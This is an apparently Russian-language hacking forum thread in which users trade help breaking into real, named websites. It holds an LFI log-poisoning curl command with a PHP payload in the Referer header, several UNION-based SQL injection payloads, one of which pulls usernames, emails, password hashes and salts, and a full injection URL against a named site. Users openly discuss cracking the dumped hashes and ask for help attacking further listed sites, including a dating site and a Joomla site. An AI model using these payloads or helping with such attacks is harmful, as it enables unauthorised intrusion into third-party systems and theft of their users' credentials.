LFI Камрады помогите советом. Есть LFI, нащупал только лги ошибок, отсылаю запрос с кодом курлом: HTML: curl http://www.domain.org/nopages1.php --referer "http://go<?phpinfo();?>" В логе режет конструкцию PHP: <? и все что после нее. Есть ли метод обхода такого фильтра?
Что за бред ты написал... У него остается закрывающая скобка в конце запроса, что и вызывает ошибку. Остается она потому что он поставил закрывающую после тройки, чем самым нарушил логику.
Есть дамп БД, необходимо некоторые данные привести в другой вид. Первоначально: Необходимо вырвать данные из определённых колонок, а именно: username:password:salt Подскажите, чем лучше это сделать? P.S. Вручную не предлагать.
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1) так тут у тебя ни одного пробела нету gl0w,это не бред если ставишь скобку перед селектом,то нужно еёё и закрывать ты чё?!?!
Все правильно он подсказал. Ты ответ БД читал до конца?) Code: WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1); 2gl0w спасибо, запрос корректен теперь 2Ereee с коментарием тоже нормуль идет
mix0x0, у тебя есть шелл на сайте? Можно отдельно колонки сдампить. Есть спец. версия by Boolean. На рдоте поищи.
в какой таблице находится логин и пароль от форума SMF? а то найти не могу( все, было найдено. Просто в 200 таблицах потерялся) кто не знает - это smf_members
Спасибо за наводку, будем гуглить. Ereee, шелла нету, только дамп бд. Нужно спарсить логины, хэши (+salt) для брута, в дальнейшем использовать как словарь.
Помогите скулю разкрутитть плыз тут http://zapoved.ru/?act=docs_more&id=3 тут http://nir.msu.mogilev.by/?mod=resource&id=31 и тут http://www.mgpu.ru/download.php?id=11048
исходя из данных каторих ты дал, можно перебирать с помощью WHERE если есть по чему перебирать типа колонка (id) или попробовать вариант с акумуляцею данных в переменную Code: union(select(1),2,3,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),5,(6)) https://rdot.org/forum/showthread.php?t=1170 -- для изучения
а чего не получается ничего вывести? http://zapoved.ru/?act=docs_more&id=3%27%29+limit+0,0+union+select+1,table_name,3,4,5,6,7+from+information_schema.tables+limit+0,1+and+%28%27DzDB%27=%27DzDB
вопрос мой исчерпан, спасибо Cybersteger, так же к прочтению всплыло https://rdot.org/forum/showthread.php?t=1243
Ребят,помогите продвинуться в раскрутке скули http://www.single-russian-woman.com...0&show=0&sorting=-1bvn5&weight1=1&weight2=210 уязвимость в параметре sorting,вроде...ошибка в HTTP-заголовке Code: http://www.single-russian-woman.com/cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210 GET /cgi-bin/search.cgi?age1=19&age2=100&country=&height1=100&height2=250&photocheck=0&seeking=0&show=0&sorting=-1bvn5&weight1=1&weight2=210 HTTP/1.1 Host: www.single-russian-woman.com User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:10.0.2) Gecko/20100101 Firefox/10.0.2 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: adv=http%3A%2F%2Fwww.google.com%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3Dsingle%2520russian%2520women%26source%3Dweb%26cd%3D1%26ved%3D0CHUQFjAA%26url%3Dhttp%253A%252F%252Fwww.single-russian-woman.com%252F%26ei%3DZlFeT4PlJc_V4QSqkL3iDw%26usg%3DAFQjCNEj3xkfJiBZvycDvWk08byKTKFdZg; seeking=0; country=; age1=19; age2=100; height1=100; height2=250; weight1=1; weight2=210; sorting=15; lang=; langlevel=; eyecolor=; haircolor=; activerest=; genrefilms=; favmusic=; zodiac=; smoking=; drinking=; children=; keyword=; name=; maritalstatus=; russian=; photost=0; session=n2aojhfg57vb0xpim5kpgc1147925 Cache-Control: max-age=0 HTTP/1.1 200 OK Date: Tue, 13 Mar 2012 19:20:30 GMT Server: Apache/2.2.3 (CentOS) [B][COLOR=Red]DBD: :mysql::st execute failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 0, 12' at line 1 at search.cgi line 1285., :mysql::st fetchrow failed: fetch() without execute() at search.cgi line 1286.[/COLOR][/B] Set-Cookie: seeking=0; path=/ Set-Cookie: country=; path=/ Set-Cookie: age1=19; path=/ Set-Cookie: age2=100; path=/ Set-Cookie: height1=100; path=/ Set-Cookie: height2=250; path=/ Set-Cookie: weight1=1; path=/ Set-Cookie: weight2=210; path=/ Set-Cookie: sorting=15; path=/ Set-Cookie: lang=; path=/ Set-Cookie: langlevel=; path=/ Set-Cookie: eyecolor=; path=/ Set-Cookie: haircolor=; path=/ Set-Cookie: activerest=; path=/ Set-Cookie: genrefilms=; path=/ Set-Cookie: favmusic=; path=/ Set-Cookie: zodiac=; path=/ Set-Cookie: smoking=; path=/ Set-Cookie: drinking=; path=/ Set-Cookie: children=; path=/ Set-Cookie: keyword=; path=/ Set-Cookie: name=; path=/ Set-Cookie: maritalstatus=; path=/ Connection: close Transfer-Encoding: chunked Content-Type: text/html ---------------------------------------------------------- также на соседском сайте джумла стоит...на нем из паблик exploitov один ток подошёл вроде..( http://seclists.org/bugtraq/2011/Apr/80 ) тоже вроде скуля,но продвинуться мне там не получилось... http://www.stopsmoking4steps.com/index.php?option=com_jce&Itemid=-1 подсобите,пожалуйста,в какую сторону копать
Где можно почитать о баге типа: news/1' ? Выдает по типу: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' and pd.news_id ='4'' at line 1
